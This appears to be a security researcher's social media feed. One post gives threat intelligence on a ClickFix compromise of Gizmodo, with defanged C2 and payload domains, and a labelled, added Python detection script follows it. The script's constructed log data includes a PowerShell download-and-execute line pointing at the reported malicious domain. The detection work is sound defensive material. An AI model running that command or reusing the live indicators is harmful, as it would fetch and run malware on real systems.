1,057 Followers
408 Following
11 Posts
Teaching faculty. Security researcher. Red team, DevOps, AppSec. An academic but not an academic. nerdprof @ Twitter
Turns out, the 64GB of RAM I bought last summer for a home lab expansion I'm only getting to now is bad. Both sticks. Cool, cool cool.
Waiting for the first person to sue their employer for cognitive damage due to forced AI use. 🤔
@steven @johnefrancis @tinker The Matrix? That's turning 27.
I see folks are choosing violence today.
@Sempf @GossiTheDog Recency bias?
Does anyone happen to have any good resources for how much malware is hosted behind CloudFlare? I know the answer is a lot, but I've no actual stats.
@Viss I'm pretty sure we all have a phishing story like this. Mine didn't involve another company, but I do think we made everyone we sent the email to think they were in hot water with HR. Good judgement is often the result of exercising bad judgement (which does not justify the bad judgement).
@cR0w You win the Internet today.

RE: https://infosec.exchange/@briankrebs/116780029181293028

Heads up, Gizmodo has been compromised by some #ErrTraffic affiliate too. Inject is in the main response.
ErrTraffic C2 cdnpro-987[.]xyz (Resolved via #EtherHiding)
PS Payload domain cdnportal-us[.]xyz (dynamic PowerShell command URI path)
PowerShell downloads a 16MB encrypted 7z file, checks if 7z is installed and otherwise downloads it to unpack the file and run the contained EXE. The EXE will do some profiling (including refresh rate) and if it passes, will drop #NetSupportRAT and run it.
NetSupport C2 178[.]16[.]55[.]191.

TA also has a Mac payload configured, but it seems broken at the moment and asks for a password of some zip file when executed 🤷

Note: ErrTraffic is a ClickFix-as-a-Service, so other compromised sites can lead to other malware from other affiliates.
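The following is an added example, not code from the post above or from its author. It refangs the defanged indicators quoted in the post and runs two small checks over constructed log data: a sweep of proxy/DNS style lines for the C2 and payload domains, and a process-tree check for the chain the post describes (one PowerShell process runs 7z to unpack a password-protected archive, then launches an EXE out of the extraction directory). The log formats, hostnames, PIDs, file paths and the archive password are all constructed for the example; nothing here is taken from the actual campaign beyond the three indicators the post lists.

```python
"""Added example (not code from the original post or its author): refang the
defanged ErrTraffic / NetSupport IOCs quoted above and sweep constructed log
lines for (a) direct IOC hits and (b) the described execution chain, in which
one PowerShell process runs 7z to unpack a password-protected archive and then
launches an EXE out of the extraction directory. Log formats, hostnames,
PIDs and file paths are all constructed for the example."""
import re
from collections import defaultdict

# IOCs exactly as defanged in the post, mapped to the role the post assigns them.
DEFANGED_IOCS = {
    "cdnpro-987[.]xyz": "ErrTraffic C2 (resolved via EtherHiding)",
    "cdnportal-us[.]xyz": "PowerShell payload domain",
    "178[.]16[.]55[.]191": "NetSupport RAT C2",
}


def refang(ioc: str) -> str:
    """Turn a defanged indicator back into a matchable string."""
    return ioc.replace("[.]", ".").replace("hxxp", "http")


IOCS = {refang(k): v for k, v in DEFANGED_IOCS.items()}

# Constructed proxy/DNS log: ts,host,src_ip,dst_host_or_ip,uri
NETWORK_LOG = """\
2025-01-01T10:00:01Z,WS01,10.0.0.5,cdnpro-987.xyz,/
2025-01-01T10:00:03Z,WS01,10.0.0.5,cdnportal-us.xyz,/a9f3b/ps1
2025-01-01T10:00:10Z,WS01,10.0.0.5,update.example.net,/ok
2025-01-01T10:01:40Z,WS01,10.0.0.5,178.16.55.191,-
"""


def ioc_hits(log: str):
    """Return (ts, host, indicator, role) for every line whose destination is a known IOC."""
    hits = []
    for line in log.splitlines():
        ts, host, _src, dst, _uri = line.split(",", 4)
        if dst.lower() in IOCS:
            hits.append((ts, host, dst, IOCS[dst.lower()]))
    return hits


# Constructed process-creation events (Sysmon EID 1 style): ts, pid, ppid, image, command line
PROCESS_LOG = [
    ("2025-01-01T10:00:03Z", 4000, 3100,
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     'powershell -w hidden -c "iwr http://cdnportal-us.xyz/a9f3b/ps1 | iex"'),
    ("2025-01-01T10:00:25Z", 4100, 4000,
     r"C:\Users\u\AppData\Local\Temp\7z\7z.exe",
     r"7z.exe x -pS3cret -oC:\Users\u\AppData\Local\Temp\out C:\Users\u\AppData\Local\Temp\p.7z"),
    ("2025-01-01T10:00:40Z", 4200, 4000,
     r"C:\Users\u\AppData\Local\Temp\out\payload.exe",
     r"C:\Users\u\AppData\Local\Temp\out\payload.exe"),
    ("2025-01-01T10:05:00Z", 5000, 3100,
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell -c Get-Date"),  # benign PowerShell, must not fire
]

POWERSHELL = re.compile(r"(^|\\)(powershell|pwsh)\.exe$", re.I)
SEVEN_ZIP = re.compile(r"(^|\\)7za?\.exe$", re.I)
EXTRACT_CMD = re.compile(r"\s[xe]\s", re.I)      # 7z "x"/"e" extract verbs
OUT_DIR = re.compile(r"-o(\S+)", re.I)           # 7z -o<dir> output switch


def find_extract_and_run(events):
    """Return (powershell_pid, extraction_dir, exe) for each PowerShell process that
    spawned a 7z extract and later launched an EXE from that extraction directory."""
    image_of = {}
    children = defaultdict(list)
    for ts, pid, ppid, image, cmd in events:
        image_of[pid] = image
        children[ppid].append((ts, pid, image, cmd))

    findings = []
    for ppid, kids in children.items():
        if not POWERSHELL.search(image_of.get(ppid, "")):
            continue
        out_dirs = []
        for _ts, _pid, image, cmd in sorted(kids):   # chronological order
            m = OUT_DIR.search(cmd)
            if SEVEN_ZIP.search(image) and EXTRACT_CMD.search(cmd) and m:
                out_dirs.append(m.group(1).rstrip("\\").lower())
                continue
            low = image.lower()
            for d in out_dirs:
                if low.startswith(d + "\\") and low.endswith(".exe"):
                    findings.append((ppid, d, image))
    return findings


if __name__ == "__main__":
    for hit in ioc_hits(NETWORK_LOG):
        print("IOC hit:", hit)
    for chain in find_extract_and_run(PROCESS_LOG):
        print("7z-extract-then-run chain under PowerShell pid:", chain)
```

The process-tree check deliberately keys on behaviour rather than on the domains, since the post notes that ErrTraffic is a service and other affiliates will use other infrastructure; the IOC sweep is the quick retro-hunt for this specific affiliate, the chain check is what survives a domain rotation.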

um, what’s that part where samsung *agrees* they’ve known about the key leak since, uh, 2016?? https://arstechnica.com/gadgets/2022/12/samsungs-android-app-signing-key-has-leaked-is-being-used-to-sign-malware/
Samsung’s Android app-signing key has leaked, is being used to sign malware

The cryptographic key proves an update is legit, assuming your OEM doesn't lose it.

Ars Technica